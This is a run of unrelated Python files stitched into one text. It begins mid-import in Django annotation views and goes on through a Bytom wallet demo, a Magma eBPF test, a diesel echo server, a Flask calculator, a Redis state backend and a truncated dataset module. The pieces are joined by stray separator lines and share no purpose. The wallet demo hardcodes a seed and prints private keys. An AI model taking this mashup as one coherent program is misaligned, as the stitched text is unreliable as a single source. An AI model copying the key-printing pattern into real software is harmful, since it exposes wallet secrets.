set_comment from reversion.views import RevisionMixin from core.mixins import ImportMixin, CheckOwnerOrStaff, FluidMixin, SuperuserRequiredMixin, LimitedPublicAccessMixin from core.utils import find_in_enum, XLSX from .exports import export_annotations from .filters import AnnotationFilter from .forms import AnnotationForm, LabelImportForm, AddFragmentsForm, FragmentForm from .mixins import PrepareDownloadMixin, SelectSegmentMixin, ImportFragmentsMixin from .models import Corpus, SubCorpus, Document, Language, Fragment, Alignment, Annotation, \ TenseCategory, Tense, Source, Sentence, Word, LabelKey from .utils import get_next_alignment, get_available_corpora, get_xml_sentences, bind_annotations_to_xml, \ natural_sort_key ############## # Static views ############## class IntroductionView(generic.TemplateView): """ Loads a static introduction view. """ template_name = 'annotations/introduction.html' class InstructionsView(generic.TemplateView): """ Loads the various steps of the instructions. """ def get_template_names(self): return 'annotations/instructions{}.html'.format(self.kwargs['n']) def get_context_data(self, **kwargs): context = super(InstructionsView, self).get_context_data(**kwargs) context['is_no_target_title'] = Annotation._meta.get_field('is_no_target').verbose_name.format( 'present perfect') context['is_translation_title'] = Annotation._meta.get_field('is_translation').verbose_name return context class StatusView(PermissionRequiredMixin, generic.TemplateView): """ Loads a static home view, with an overview of the annotation progress. 
""" template_name = 'annotations/home.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): """Creates a list of tuples with information on the annotation progress.""" context = super(StatusView, self).get_context_data(**kwargs) corpus_pk = self.kwargs.get('pk', None) if corpus_pk: corpora = [get_object_or_404(Corpus, pk=corpus_pk)] else: corpora = get_available_corpora(self.request.user) # Retrieve the totals per language pair languages = {language.pk: language for language in Language.objects.all()} alignments = Alignment.objects.filter(original_fragment__document__corpus__in=corpora) totals = alignments \ .values('original_fragment__language', 'translated_fragment__language') \ .order_by('original_fragment__language', 'translated_fragment__language') \ .annotate(count=Count('pk')) completed = {(t.get('original_fragment__language'), t.get('translated_fragment__language')): t.get('count') for t in totals.exclude(annotation=None)} # Convert the QuerySets into a list of tuples language_totals = [] for total in totals: l1 = languages.get(total['original_fragment__language']) l2 = languages.get(total['translated_fragment__language']) complete = completed.get((l1.pk, l2.pk), 0) available = total['count'] language_totals.append((l1, l2, complete, available)) context['languages'] = language_totals context['corpus_pk'] = corpus_pk context['current_corpora'] = corpora return context ################# # CRUD Annotation ################# class AnnotationMixin(SelectSegmentMixin, SuccessMessageMixin, PermissionRequiredMixin): model = Annotation form_class = AnnotationForm permission_required = 'annotations.change_annotation' def __init__(self): """Creates an attribute to cache the Alignment.""" super(AnnotationMixin, self).__init__() self.alignment = None def get_form_kwargs(self): """Sets the User and the Alignment as a form kwarg.""" kwargs = super(AnnotationMixin, self).get_form_kwargs() kwargs['user'] = self.request.user kwargs['alignment'] = self.get_alignment() kwargs['select_segment'] = self.request.session.get('select_segment', False) return kwargs def get_context_data(self, **kwargs): """Sets the Alignment on the context.""" context = super(AnnotationMixin, self).get_context_data(**kwargs) context['alignment'] = self.get_alignment() return context def get_alignment(self): raise NotImplementedError def get_alignments(self): """Retrieve related fields on Alignment to prevent extra queries.""" return Alignment.objects \ .select_related('original_fragment__document__corpus', 'translated_fragment__document__corpus') \ .prefetch_related('original_fragment__sentence_set__word_set', 'translated_fragment__sentence_set__word_set') class RevisionWithCommentMixin(RevisionMixin): revision_manage_manually = True def form_valid(self, form): result = super().form_valid(form) if form.changed_data: add_to_revision(self.object) set_comment(self.format_change_comment(form.changed_data, form.cleaned_data)) return result def format_change_for_field(self, field, value): if isinstance(value, QuerySet): value = ', '.join(map(str, value)) return '{} to "{}"'.format(field, value) def format_change_comment(self, changes, values): parts = [] for change in changes: parts.append(self.format_change_for_field(change, values[change])) return 'Changed {}'.format(', '.join(parts)) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['revisions'] = Version.objects.get_for_object(self.object) return context class RevisionCreateMixin(RevisionMixin): 
def form_valid(self, form): set_comment('Created annotation') return super().form_valid(form) class AnnotationUpdateMixin(AnnotationMixin, CheckOwnerOrStaff, RevisionWithCommentMixin): def get_context_data(self, **kwargs): """Sets the annotated Words on the context.""" context = super(AnnotationUpdateMixin, self).get_context_data(**kwargs) context['annotated_words'] = self.object.words.all() return context def get_success_url(self): """Returns to the overview per language.""" alignment = self.get_alignment() l1 = alignment.original_fragment.language.iso l2 = alignment.translated_fragment.language.iso return reverse('annotations:list', args=(l1, l2,)) def get_alignment(self): """Retrieves the Alignment from the object.""" if not self.alignment: self.alignment = self.get_alignments().get(pk=self.object.alignment.pk) return self.alignment class AnnotationCreate(AnnotationMixin, RevisionCreateMixin, generic.CreateView): success_message = 'Annotation created successfully' def get_success_url(self): """Go to the choose-view to select a new Alignment.""" alignment = self.object.alignment return reverse('annotations:choose', args=(alignment.original_fragment.document.corpus.pk, alignment.original_fragment.language.iso, alignment.translated_fragment.language.iso)) def form_valid(self, form): """Sets the User and Alignment on the created instance.""" form.instance.annotated_by = self.request.user form.instance.alignment = self.get_alignment() return super(AnnotationCreate, self).form_valid(form) def get_alignment(self): """Retrieves the Alignment by the pk in the kwargs.""" if not self.alignment: self.alignment = get_object_or_404(self.get_alignments(), pk=self.kwargs['pk']) return self.alignment class AnnotationUpdate(AnnotationUpdateMixin, generic.UpdateView): success_message = 'Annotation edited successfully' def form_valid(self, form): """Sets the last modified by on the instance.""" form.instance.last_modified_by = self.request.user return super(AnnotationUpdate, self).form_valid(form) class AnnotationDelete(AnnotationUpdateMixin, generic.DeleteView): success_message = 'Annotation deleted successfully' class AnnotationChoose(PermissionRequiredMixin, generic.RedirectView): permanent = False pattern_name = 'annotations:create' permission_required = 'annotations.change_annotation' def get_redirect_url(self, *args, **kwargs): """Redirects to the next open Alignment.""" l1 = Language.objects.get(iso=self.kwargs['l1']) l2 = Language.objects.get(iso=self.kwargs['l2']) corpus = Corpus.objects.get(pk=int(self.kwargs['corpus'])) if 'corpus' in self.kwargs else None next_alignment = get_next_alignment(self.request.user, l1, l2, corpus) # If no next Alignment has been found, redirect to the status overview if not next_alignment: messages.success(self.request, 'All work is done for this language pair!') return reverse('annotations:status') corpus_pk = next_alignment.original_fragment.document.corpus.pk return super().get_redirect_url(corpus_pk, next_alignment.pk) ############ # CRUD Fragment ############ class FragmentDetailMixin(generic.DetailView): model = Fragment def get_object(self, queryset=None): qs = Fragment.objects \ .select_related('document__corpus', 'language', 'tense') \ .prefetch_related('original', 'sentence_set__word_set') fragment = super().get_object(qs) if fragment.document.corpus not in get_available_corpora(self.request.user): raise PermissionDenied referer_url = self.request.headers.get('referer', '') allowed_referers = referer_url.endswith((reverse('stats:fragment_table'), 
reverse('stats:fragment_table_mds'))) if not (self.request.user.is_authenticated or allowed_referers): raise PermissionDenied return fragment class FragmentDetail(LimitedPublicAccessMixin, FragmentDetailMixin): def get_context_data(self, **kwargs): context = super(FragmentDetail, self).get_context_data(**kwargs) fragment = self.object limit = 5 # TODO: magic number doc_sentences = get_xml_sentences(fragment, limit) context['sentences'] = doc_sentences or fragment.sentence_set.all() context['limit'] = limit context['public_languages'] = settings.PUBLIC_FRAG_LANG_IDS return context class FragmentDetailPlain(LoginRequiredMixin, FragmentDetailMixin): template_name = 'annotations/fragment_detail_plain.html' class FragmentRevisionWithCommentMixin(RevisionWithCommentMixin): def format_change_for_field(self, field, value): if field == 'formal_structure': return 'formal structure to ' + find_in_enum(value, Fragment.FORMAL_STRUCTURES) if field == 'sentence_function': return 'sentence function to ' + find_in_enum(value, Fragment.SENTENCE_FUNCTIONS) return super().format_change_for_field(field, value) class FragmentEdit(SelectSegmentMixin, LoginRequiredMixin, FragmentRevisionWithCommentMixin, generic.UpdateView): model = Fragment form_class = FragmentForm def get_context_data(self, **kwargs): """Sets the annotated Words on the context.""" context = super(FragmentEdit, self).get_context_data(**kwargs) context['annotated_words'] = self.object.targets() return context def get_success_url(self): return reverse('annotations:show', args=(self.object.pk,)) def form_valid(self, form): """Updates the target words.""" for word in Word.objects.filter(sentence__fragment=self.object): word.is_target = word in form.cleaned_data['words'] word.save() return super(FragmentEdit, self).form_valid(form) ############ # CRUD Corpus ############ class CorpusList(LoginRequiredMixin, generic.ListView): model = Corpus context_object_name = 'corpora' ordering = 'title' class CorpusDetail(LoginRequiredMixin, generic.DetailView): model = Corpus def get_context_data(self, **kwargs): context = super(CorpusDetail, self).get_context_data(**kwargs) # Retrieve all Documents and order them by title corpus = self.object documents = {d.pk: d.title for d in corpus.documents.all()} documents_sorted = sorted(list(documents.items()), key=lambda x: natural_sort_key(x[1])) document_pks = [d[0] for d in documents_sorted] # Create a list of Languages languages = defaultdict(list) for language in corpus.languages.all(): languages[language.title] = [None] * len(document_pks) # Retrieve the number of Annotations per document by_document = Annotation.objects. \ filter(alignment__translated_fragment__document__corpus=corpus). \ values('alignment__translated_fragment__language__title', 'alignment__translated_fragment__document__pk'). \ annotate(Count('pk')) # Wrap the number of Annotations into the list of Languages for d in by_document: language = d.get('alignment__translated_fragment__language__title') document_pk = d.get('alignment__translated_fragment__document__pk') # Additional sanity check: # happens if the language is not defined as a Corpus language, but nevertheless Annotations exist. 
            if languages.get(language):
                index = document_pks.index(document_pk)
                languages[language][index] = d.get('pk__count')

        # And finally, append the list of Document and Languages to the context
        context['documents'] = documents_sorted
        context['languages'] = dict(languages)

        return context


############
# CRUD Document
############
class DocumentDetail(LoginRequiredMixin, generic.DetailView):
    model = Document


############
# CRUD Source
############
class SourceDetail(LoginRequiredMixin, generic.DetailView):
    model = Source

    def get_object(self, queryset=None):
        qs = Source.objects.select_related('document__corpus', 'language')
        source = super(SourceDetail, self).get_object(qs)
        return source

    def get_context_data(self, **kwargs):
        context = super(SourceDetail, self).get_context_data(**kwargs)

        source = self.object
        tree, failed_lookups = bind_annotations_to_xml(source)
        additional_sources = Source.objects \
            .filter(document=source.document) \
            .exclude(pk=source.pk) \
            .select_related('language')

        transform = etree.XSLT(etree.fromstring(render_to_string('annotations/xml_transform.xslt').encode('utf-8')))

        context['sentences'] = [transform(p) for p in tree.iter('p', 'head')]
        context['failed_lookups'] = failed_lookups
        context['additional_sources'] = additional_sources
        context['rows'] = [(x,) for x in context['sentences']]

        additional_source = self.request.GET.get('additional_source')
        if additional_source:
            source = get_object_or_404(Source, pk=additional_source)
            add_tree, add_failed_lookups = bind_annotations_to_xml(source)
            context['additional_source'] = source
            context['additional_sentences'] = [transform(p) for p in add_tree.iter('p', 'head')]
            # list.extend() mutates in place and returns None, so its result
            # must not be assigned back to the context entry.
            context['failed_lookups'].extend(add_failed_lookups)
            context['rows'] = zip(context['sentences'], context['additional_sentences'])

        return context


############
# List views
############
class AnnotationList(PermissionRequiredMixin, FluidMixin, FilterView):
    context_object_name = 'annotations'
    filterset_class = AnnotationFilter
    paginate_by = 15
    permission_required = 'annotations.change_annotation'

    def get_queryset(self):
        """
        Retrieves all Annotations for the given source (l1) and target (l2) language.

        :return: A QuerySet of Annotations.
        """
        target_words = Sentence.objects.
\ prefetch_related(Prefetch('word_set', queryset=Word.objects.filter(is_target=True))) return Annotation.objects \ .filter(alignment__original_fragment__language__iso=self.kwargs['l1']) \ .filter(alignment__translated_fragment__language__iso=self.kwargs['l2']) \ .filter(alignment__original_fragment__document__corpus__in=get_available_corpora(self.request.user)) \ .select_related('annotated_by', 'tense', 'alignment__original_fragment', 'alignment__original_fragment__document', 'alignment__original_fragment__tense', 'alignment__translated_fragment') \ .prefetch_related('alignment__original_fragment__sentence_set__word_set', Prefetch('alignment__original_fragment__sentence_set', queryset=target_words, to_attr='targets_prefetched'), 'alignment__translated_fragment__sentence_set__word_set', 'alignment__original_fragment__labels', 'labels', 'words') \ .order_by('-annotated_at') def get_filterset(self, filterset_class): kwargs = self.get_filterset_kwargs(filterset_class) request = kwargs['request'] l1, l2 = request.resolver_match.kwargs['l1'], request.resolver_match.kwargs['l2'] session_key = 'annotation_filter_{}_{}'.format(l1, l2) if kwargs['data']: request.session[session_key] = kwargs['data'].urlencode() elif session_key in request.session: kwargs['data'] = QueryDict(request.session[session_key]) return filterset_class(l1, l2, **kwargs) class FragmentList(PermissionRequiredMixin, generic.ListView): """ TODO: consider refactoring, too many queries. """ context_object_name = 'fragments' template_name = 'annotations/fragment_list.html' paginate_by = 25 permission_required = 'annotations.change_annotation' def get_queryset(self): """ Retrieves all Fragments for the given language that have an Annotation that contains a target expression. :return: A list of Fragments. """ results = [] fragments = Fragment.objects.filter(language__iso=self.kwargs['language']) \ .filter(document__corpus__in=get_available_corpora(self.request.user)) for fragment in fragments: if Annotation.objects.filter(alignment__original_fragment=fragment, is_no_target=False).exists(): results.append(fragment) if len(results) == 50: # TODO: Capping this for now with a magic number. break return results def get_context_data(self, **kwargs): """ Sets the current language and other_languages on the context. :param kwargs: Contains the current language. :return: The context variables. """ context = super(FragmentList, self).get_context_data(**kwargs) language = self.kwargs['language'] corpus = context['fragments'][0].document.corpus context['language'] = Language.objects.filter(iso=language) context['other_languages'] = corpus.languages.exclude(iso=language) context['show_tenses'] = self.kwargs.get('showtenses', False) return context class TenseCategoryList(PermissionRequiredMixin, FluidMixin, generic.ListView): model = TenseCategory context_object_name = 'tensecategories' template_name = 'annotations/tenses.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): """ Sets the tenses and languages on the context. :return: The context variables. 
""" context = super(TenseCategoryList, self).get_context_data(**kwargs) tense_cache = {(t.category.title, t.language.iso): t.title for t in Tense.objects.select_related('category', 'language')} tense_categories = TenseCategory.objects.all() tenses = defaultdict(list) languages = [] for language in Language.objects.order_by('iso'): if not Tense.objects.filter(language=language): continue languages.append(language) for tc in tense_categories: tense = tense_cache.get((tc.title, language.iso), '') tenses[tc].append(tense) context['tenses'] = sorted(list(tenses.items()), key=lambda item: item[0].pk) context['languages'] = languages return context class LabelList(PermissionRequiredMixin, FluidMixin, generic.ListView): model = LabelKey context_object_name = 'labelkeys' template_name = 'annotations/labels.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) corpus = self.kwargs.get('corpus') if corpus: corpus = Corpus.objects.get(pk=corpus) else: corpus = get_available_corpora(self.request.user)[0] self.object_list = self.object_list.filter(corpora=corpus) context['label_keys'] = self.object_list labels = [key.labels.all() for key in self.object_list] # transpose the 2d array stored in labels so that we could have each label key # show in a column on the html table transposed = [] max_len = max([len(x) for x in labels]) if labels else 0 for i in range(max_len): transposed.append([]) for group in labels: if len(group) > i: transposed[-1].append(group[i]) else: # add empty table cells transposed[-1].append('') context['labels'] = transposed context['corpus'] = corpus context['corpora'] = get_available_corpora(self.request.user) return context ############## # Export views ############## class PrepareDownload(PrepareDownloadMixin, generic.TemplateView): template_name = 'annotations/download.html' class ExportPOSPrepare(PermissionRequiredMixin, generic.View): permission_required = 'annotations.change_annotation' def get(self, request, *args, **kwargs): language = self.request.GET['language'] corpus_id = self.request.GET['corpus'] subcorpus_id = self.request.GET['subcorpus'] document_id = self.request.GET['document'] include_non_targets = 'include_non_targets' in self.request.GET add_lemmata = 'add_lemmata' in self.request.GET pos_file = NamedTemporaryFile(delete=False) self.request.session['pos_file'] = pos_file.name corpus = Corpus.objects.get(pk=int(corpus_id)) subcorpus = SubCorpus.objects.get(pk=int(subcorpus_id)) if subcorpus_id != 'all' else None document = Document.objects.get(pk=int(document_id)) if document_id != 'all' else None document_title = document.title if document_id != 'all' else 'all' filename = '{}-{}-{}.xlsx'.format(urlquote(corpus.title), urlquote(document_title), language) self.request.session['pos_filename'] = filename export_annotations(pos_file.name, XLSX, corpus, language, subcorpus=subcorpus, document=document, include_non_targets=include_non_targets, add_lemmata=add_lemmata) return JsonResponse(dict(done=True)) class ExportPOSDownload(PermissionRequiredMixin, generic.View): permission_required = 'annotations.change_annotation' def get(self, request, *args, **kwargs): pos_file = self.request.session['pos_file'] pos_filename = self.request.session['pos_filename'] with open(pos_file, 'rb') as f: contents = f.read() os.unlink(pos_file) response = HttpResponse(contents, content_type='application/xlsx') response['Content-Disposition'] = 'attachment; filename={}'.format(pos_filename) return 
response ############## # Import views ############## class ImportLabelsView(SuperuserRequiredMixin, ImportMixin): """ Allows superusers to import labels to Annotations and Fragments. """ form_class = LabelImportForm template_name = 'annotations/label_form.html' success_message = 'Successfully imported the labels!' def get_success_url(self): return reverse('annotations:import-labels') class AddFragmentsView(SuperuserRequiredMixin, ImportFragmentsMixin): """ Allows superusers to import Fragments. """ form_class = AddFragmentsForm template_name = 'annotations/add_fragments_form.html' success_message = 'Successfully added the fragments!' def get_success_url(self): return reverse('annotations:add-fragments')
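# ---------------------------------------------------------------------------
# Hedged sketch: a minimal urls.py wiring for the views above, inferred from
# the reverse() calls in this module ('annotations:status', 'annotations:create',
# 'annotations:choose', 'annotations:list', 'annotations:show',
# 'annotations:import-labels', 'annotations:add-fragments'). Only the route
# *names* come from the module; the URL patterns themselves are assumptions.
#
# from django.urls import path
# from . import views
#
# app_name = 'annotations'
# urlpatterns = [
#     path('status/', views.StatusView.as_view(), name='status'),
#     path('create/<int:corpus>/<int:pk>/', views.AnnotationCreate.as_view(), name='create'),
#     path('choose/<int:corpus>/<str:l1>/<str:l2>/', views.AnnotationChoose.as_view(), name='choose'),
#     path('list/<str:l1>/<str:l2>/', views.AnnotationList.as_view(), name='list'),
#     path('show/<int:pk>/', views.FragmentDetail.as_view(), name='show'),
#     path('import-labels/', views.ImportLabelsView.as_view(), name='import-labels'),
#     path('add-fragments/', views.AddFragmentsView.as_view(), name='add-fragments'),
# ]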
nilq/baby-python
python
#!/usr/bin/env python3 from pybytom.wallet import Wallet from pybytom.assets import BTM as ASSET from pybytom.utils import amount_converter import json # Choose network mainnet, solonet or testnet NETWORK: str = "mainnet" # Default is mainnet # Wallet seed SEED: str = "b3337a2fe409afbb257b504e4c09d36b57c32c452b71a0ed413298a5172f727a06bf6605488" \ "723bc545a4bd51f5cd29a3e8bd1433bd1d26e6bf866ff53d1493f" # Message data MESSAGE: str = "a0841d35364046649ab8fc4af5a6266245890778f6cf7304696c4ab8edd86242" # Initialize Bytom wallet wallet: Wallet = Wallet(network=NETWORK) # Get Bytom wallet from seed wallet.from_seed(seed=SEED) # Derivation from path wallet.from_path("m/44/153/1/0/1") # Or derivation from index # wallet.from_index(44) # wallet.from_index(153) # wallet.from_index(1) # wallet.from_index(0) # wallet.from_index(1) # Or derivation from indexes # wallet.from_indexes(["2c000000", "99000000", "01000000", "00000000", "01000000"]) # Print all wallet information's # print(json.dumps(wallet.dumps(), indent=4, ensure_ascii=False)) print("Seed:", wallet.seed()) print("XPrivate Key:", wallet.xprivate_key()) print("Expand XPrivate Key:", wallet.expand_xprivate_key()) print("XPublic Key:", wallet.xpublic_key()) # print("GUID:", wallet.guid()) print("Indexes:", wallet.indexes()) print("Path:", wallet.path()) print("Child XPrivate Key:", wallet.child_xprivate_key()) print("Child XPublic Key:", wallet.child_xpublic_key()) print("Private Key:", wallet.private_key()) print("Public Key:", wallet.public_key()) print("Program:", wallet.program()) print("Address:", wallet.address(vapor=False)) print("Vapor Address:", wallet.address(vapor=True)) print("Balance:", amount_converter(wallet.balance(asset=ASSET, vapor=False), "NEU2BTM"), "BTM") print("Vapor Balance:", amount_converter(wallet.balance(asset=ASSET, vapor=True), "NEU2BTM"), "BTM") print("UTXO's:", wallet.utxos(asset=ASSET, vapor=False)) print("Vapor UTXO's:", wallet.utxos(asset=ASSET, vapor=True)) print("-------- Sign & Verify --------") print("Message:", MESSAGE) signature = wallet.sign(message=MESSAGE) print("Signature:", signature) print("Verified:", wallet.verify(message=MESSAGE, signature=signature))
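# ---------------------------------------------------------------------------
# Hedged sketch: the comments above state that from_path("m/44/153/1/0/1") and
# the chain of from_index calls are equivalent derivations. A quick check,
# using only the API already exercised in this script:

def derivation_paths_match(seed: str) -> bool:
    """Return True if from_path and chained from_index derive the same address."""
    w1 = Wallet(network=NETWORK)
    w1.from_seed(seed=seed)
    w1.from_path("m/44/153/1/0/1")

    w2 = Wallet(network=NETWORK)
    w2.from_seed(seed=seed)
    for index in (44, 153, 1, 0, 1):
        w2.from_index(index)

    return w1.address(vapor=False) == w2.address(vapor=False)

# print("Derivations match:", derivation_paths_match(SEED))  # uncomment to check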
nilq/baby-python
python
""" Copyright 2020 The Magma Authors. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging import socket import subprocess import threading import time import unittest import warnings from concurrent.futures import Future from lte.protos.mobilityd_pb2 import IPAddress from magma.pipelined.bridge_util import BridgeTools from magma.pipelined.ebpf.ebpf_manager import EbpfManager from scapy.all import AsyncSniffer from scapy.layers.inet import IP, UDP GTP_SCRIPT = "/home/vagrant/magma/lte/gateway/python/magma/pipelined/tests/script/gtp-packet.py" PY_PATH = "/home/vagrant/build/python/bin/python" UL_HANDLER = "/home/vagrant/magma/lte/gateway/python/magma/pipelined/ebpf/ebpf_ul_handler.c" BPF_HEADER_PATH = "/home/vagrant/magma/orc8r/gateway/c/common/ebpf/" # This test works when ran separately. @unittest.skip("AsyncSniffer is not working") class eBpfDatapathULTest(unittest.TestCase): NS_NAME = 'ens1' gtp_veth = "enb0" gtp_veth_ns = "enb1" sgi_veth = "sgi0" sgi_veth1 = "sgi1" sgi_veth_ip = "3.3.3.3" inner_src_ip = '2.2.2.2' inner_dst_ip = '2.2.2.1' gtp_pkt_dst = '11.1.1.1' gtp_pkt_src = '11.1.1.2' packet_cap1 = [] sniffer = None ebpf_man = None @classmethod def setUpClass(cls): pass @classmethod def setUpClassDevices(cls): BridgeTools.delete_ns_all() BridgeTools.create_veth_pair(cls.gtp_veth, cls.gtp_veth_ns) BridgeTools.ifup_netdev(cls.gtp_veth, cls.gtp_pkt_dst + "/24") BridgeTools.create_veth_pair(cls.sgi_veth, cls.sgi_veth1) BridgeTools.create_ns_and_move_veth(cls.NS_NAME, cls.gtp_veth_ns, cls.gtp_pkt_src + "/24") BridgeTools.ifup_netdev(cls.sgi_veth, cls.sgi_veth_ip + "/24") BridgeTools.ifup_netdev(cls.sgi_veth1) gw_ip = IPAddress(version=IPAddress.IPV4, address=socket.inet_aton(cls.sgi_veth_ip)) cls.ebpf_man = EbpfManager(cls.sgi_veth, cls.gtp_veth, gw_ip, UL_HANDLER, bpf_header_path=BPF_HEADER_PATH) cls.ebpf_man.detach_ul_ebpf() cls.ebpf_man.attach_ul_ebpf() cls.sniffer = AsyncSniffer( iface=cls.sgi_veth1, store=False, prn=cls.pkt_cap_fun, ) cls.sniffer.start() @classmethod def sendPacket(cls, gtp_src, gtp_dst, udp_src, udp_dst): try: xmit_cmd = [ "ip", "netns", "exec", cls.NS_NAME, PY_PATH, GTP_SCRIPT, gtp_src, gtp_dst, udp_src, udp_dst, cls.gtp_veth_ns, ] subprocess.check_call(xmit_cmd) logging.debug("del ns %s", xmit_cmd) except subprocess.CalledProcessError as e: logging.debug("Error while xmit from ns: %s", e) @classmethod def tearDownClassDevices(cls): cls.ebpf_man.detach_ul_ebpf() cls.sniffer.stop() BridgeTools.delete_ns_all() BridgeTools.delete_veth(cls.gtp_veth) BridgeTools.delete_veth(cls.sgi_veth) @classmethod def pkt_cap_fun(cls, packet): # print("got packet: %s", packet) cls.packet_cap1.append(packet) @classmethod def count_udp_packet(cls): cnt = 0 for pkt in cls.packet_cap1: # print(pkt.show(dump=True)) if IP in pkt: if pkt[IP].src == cls.inner_src_ip and pkt[IP].dst == cls.inner_dst_ip: cnt = cnt + 1 return cnt def testEbpfUlFrw1(self): cls = self.__class__ cls.setUpClassDevices() cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(len(cls.packet_cap1), 0) cls.ebpf_man.add_ul_entry(100, cls.inner_src_ip) cls.sendPacket(cls.gtp_pkt_src, 
cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 1) cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 2) cls.ebpf_man.del_ul_entry(cls.inner_src_ip) cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 2) cls.tearDownClassDevices()
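# Hedged addition: the module-level comment notes this test "works when ran
# separately", but the file defines no entry point. A standard unittest runner
# makes that explicit; the @unittest.skip decorator on the class must be
# lifted (and the vagrant paths and privileges the test assumes must be
# available) for it to actually execute.
if __name__ == "__main__":
    unittest.main()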
nilq/baby-python
python
# vim:ts=4:sw=4:expandtab '''Simple echo server. ''' from diesel import Application, Service, until_eol, send def hi_server(addr): while 1: inp = until_eol() if inp.strip() == "quit": break send("you said %s" % inp) app = Application() app.add_service(Service(hi_server, 8013)) app.run()
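# Hedged companion sketch: a minimal stdlib client for the echo server above,
# to be run as a separate script while the server is up. Host/port mirror the
# Service() registration; the line protocol ("quit" to stop, "you said ..."
# replies) is taken from hi_server itself.
#
# import socket
#
# with socket.create_connection(('localhost', 8013)) as sock:
#     sock.sendall(b'hello\r\n')            # until_eol() reads one line
#     print(sock.recv(1024).decode())       # -> "you said hello"
#     sock.sendall(b'quit\r\n')             # server breaks out of its loop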
nilq/baby-python
python
from flask import Flask, request, redirect, render_template, url_for, send_from_directory
import calculator as hsc

application = Flask(__name__)


@application.route('/')
def index():
    return redirect(url_for('calculation'))


@application.route('/calculation', methods=["POST", "GET"])
def calculation():
    if request.method == "POST":
        winning_needed = round(float(request.form["total_winning_needed"]))
        winning_star_bounce = round(float(request.form["winning_star_bounce"]))
        rate = float(request.form["winning_rate"])
        five_to_one = request.form["five_to_one"] == "Yes"
        imd = hsc.run(
            total_winning_needed=winning_needed,
            star_bounce=winning_star_bounce,
            winning_rate=rate,
            have_five_to_one=five_to_one
        )
        # file_url = url_for('download_file', filename=str(file_id) + '.png')
        return render_template('result.html', file_url=imd)
    else:
        return render_template('calculation.html')


@application.route('/download_file/<filename>')
def download_file(filename):
    # Use a forward slash so the path also resolves outside Windows
    return send_from_directory('templates/pic', filename, as_attachment=True)


if __name__ == "__main__":
    application.run()
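# ---------------------------------------------------------------------------
# Hedged sketch: a smoke test for the /calculation form using Flask's built-in
# test client. The field names mirror the request.form keys above; the values
# are arbitrary examples, and calculator.run() must be importable for the
# handler to respond.

def smoke_test_calculation():
    client = application.test_client()
    response = client.post('/calculation', data={
        'total_winning_needed': '30',
        'winning_star_bounce': '5',
        'winning_rate': '0.6',
        'five_to_one': 'Yes',
    })
    assert response.status_code == 200

# smoke_test_calculation()  # uncomment to exercise the form handler directly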
nilq/baby-python
python
import json import logging from typing import TYPE_CHECKING, Any, Optional, TypeVar from redis.asyncio import Redis, from_url from mognet.exceptions.base_exceptions import NotConnected from mognet.state.base_state_backend import BaseStateBackend from mognet.state.state_backend_config import StateBackendConfig from mognet.tools.urls import censor_credentials if TYPE_CHECKING: from mognet.app.app import App _TValue = TypeVar("_TValue") _log = logging.getLogger(__name__) class RedisStateBackend(BaseStateBackend): def __init__(self, config: StateBackendConfig, app: "App") -> None: super().__init__() self.config = config self.__redis = None self.app = app @property def _redis(self) -> Redis: if self.__redis is None: raise NotConnected return self.__redis async def get( self, request_id: str, key: str, default: _TValue = None ) -> Optional[_TValue]: state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hexists(state_key, key) tr.hget(state_key, key) tr.expire(state_key, self.config.redis.state_ttl) exists, value, *_ = await tr.execute() if not exists: _log.debug( "State of id=%r key=%r did not exist; returning default", request_id, key, ) return default return json.loads(value) async def set(self, request_id: str, key: str, value: Any): state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hset(state_key, key, json.dumps(value).encode()) tr.expire(state_key, self.config.redis.state_ttl) await tr.execute() async def pop( self, request_id: str, key: str, default: _TValue = None ) -> Optional[_TValue]: state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hexists(state_key, key) tr.hget(state_key, key) tr.hdel(state_key, key) tr.expire(state_key, self.config.redis.state_ttl) exists, value, *_ = await tr.execute() if not exists: _log.debug( "State of id=%r key=%r did not exist; returning default", request_id, key, ) return default return json.loads(value) async def clear(self, request_id: str): state_key = self._format_key(request_id) _log.debug("Clearing state of id=%r", state_key) return await self._redis.delete(state_key) def _format_key(self, result_id: str) -> str: key = f"{self.app.name}.mognet.state.{result_id}" _log.debug("Formatted state key=%r for id=%r", key, result_id) return key async def __aenter__(self): await self.connect() return self async def __aexit__(self, *args, **kwargs): await self.close() async def connect(self): redis: Redis = from_url( self.config.redis.url, max_connections=self.config.redis.max_connections, ) self.__redis = redis async def close(self): redis = self.__redis if redis is not None: self.__redis = None await redis.close() def __repr__(self): return f"RedisStateBackend(url={censor_credentials(self.config.redis.url)!r})"
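# ---------------------------------------------------------------------------
# Hedged usage sketch. The backend above only reads config.redis.url,
# config.redis.max_connections, config.redis.state_ttl and app.name, so any
# objects exposing those attributes will do; the real StateBackendConfig and
# App constructors are not shown here and their signatures are assumptions.
#
# import asyncio
#
# async def demo(config, app):
#     async with RedisStateBackend(config, app) as backend:
#         await backend.set("req-1", "progress", {"done": 10})
#         print(await backend.get("req-1", "progress"))   # -> {'done': 10}
#         print(await backend.pop("req-1", "progress"))   # -> {'done': 10}, then removed
#         await backend.clear("req-1")
#
# asyncio.run(demo(config, app))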
nilq/baby-python
python
import logging
import tempfile
import zipfile
from collections import OrderedDict
from pathlib import Path

import numpy as np
from PIL import Image
from scipy.io import loadmat

from . import download
from .enums import Split

logger = logging.getLogger(__name__)


class LeedsSportBase:
    FOLDER_NAME = None
    DATA_URL = None

